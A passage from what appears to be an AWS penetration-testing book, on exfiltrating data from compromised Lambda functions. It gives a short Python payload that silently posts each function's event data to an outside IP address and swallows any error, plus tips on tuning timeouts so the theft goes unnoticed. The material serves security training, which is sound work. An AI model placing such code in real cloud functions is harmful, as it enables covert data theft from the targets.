Data exfiltration

Data exfiltration will likely work very similarly to how we escalated our privileges previously, in that we will most likely edit an existing function and exfiltrate data from it like that. There are a lot of different ways we could do this, some of which are listed here:

Modify an existing function and exfiltrate the data that it is receiving through the "event" and "context" parameters
Create a new function and associated trigger to respond to certain events in the AWS environment, such as in Chapter 11, Using Boto3 and Pacu to Maintain AWS Persistence where we exfiltrated credentials every time a new user was created
Modify an existing function and place our exfiltration payload somewhere in the middle of the function to exfiltrate data that is gathered/modified during the function's normal execution

There are many other attack vectors here, as well; you just need to get creative.

If we just wanted our payload to exfiltrate the value passed to the "event" parameter, we could use a slightly modified version of the previous payload:

try:
    from botocore.vendored import requests
    requests.post('http://1.1.1.1', json=event, timeout=0.01)
except:
    pass

Make sure to be aware of the timeout specified for the Lambda function you are working with. You don't want your exfiltration to take so long that the Lambda function times out and fails all together, so when you are exfiltrating large amounts of data through Lambda, it would be best to either ensure the timeout is already set to a high amount of time, or to go in and modify it yourself to increase the timeout. The problem with that is that the target's Lambda bill will go up, because their functions are taking longer to complete than normal, which would draw attention to you.

Table of Contents for Data exfiltration

Create new playlist

Sign In

Sign Up

Table of Contents for
Data exfiltration